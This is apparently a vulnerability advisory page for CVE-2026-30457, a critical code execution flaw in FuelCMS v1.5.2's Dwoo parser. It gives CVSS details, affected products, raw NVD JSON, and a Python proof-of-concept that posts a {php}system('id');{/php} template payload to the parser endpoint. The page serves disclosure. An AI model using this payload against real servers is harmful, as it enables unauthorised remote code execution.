Security Vulnerability Report
中文
CVE-2026-30457 CVSS 9.8 CRITICAL

CVE-2026-30457

Published: 2026-03-26 19:17:00
Last Modified: 2026-03-30 14:11:07

Description

An issue in the /parser/dwoo component of Daylight Studio FuelCMS v1.5.2 allows attackers to execute arbitrary code via crafted PHP code.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thedaylightstudio:dwoo:1.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.2:*:*:*:*:*:*:* - VULNERABLE
Daylight Studio FuelCMS v1.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Replace with actual target) target_url = "http://example.com/parser/dwoo" # Malicious PHP code payload intended for the vulnerable Dwoo component # This payload attempts to execute the 'id' command on the server payload = "{php}system('id');{/php}" # Data to be sent in the request data = { "code": payload, "test": "1" } try: print("[*] Sending payload to target...") response = requests.post(target_url, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30457", "sourceIdentifier": "[email protected]", "published": "2026-03-26T19:16:59.900", "lastModified": "2026-03-30T14:11:06.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the /parser/dwoo component of Daylight Studio FuelCMS v1.5.2 allows attackers to execute arbitrary code via crafted PHP code."}, {"lang": "es", "value": "Un problema en el componente /parser/dwoo de Daylight Studio FuelCMS v1.5.2 permite a los atacantes ejecutar código arbitrario a través de código PHP especialmente diseñado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thedaylightstudio:dwoo:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "198E645D-F606-400B-BCAA-525E32EB8051"}, {"vulnerable": true, "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "E3A44312-83D2-4421-9A35-3FD048EA578A"}]}]}], "references": [{"url": "http://daylight.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://fuelcms.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/daylightstudio/FUEL-CMS/tree/master/fuel/modules/fuel/libraries/parser/dwoo", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://pentest-tools.com/PTT-2025-026-PHP-Code-Execution-Via-Dwoo-Escape.pdf", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}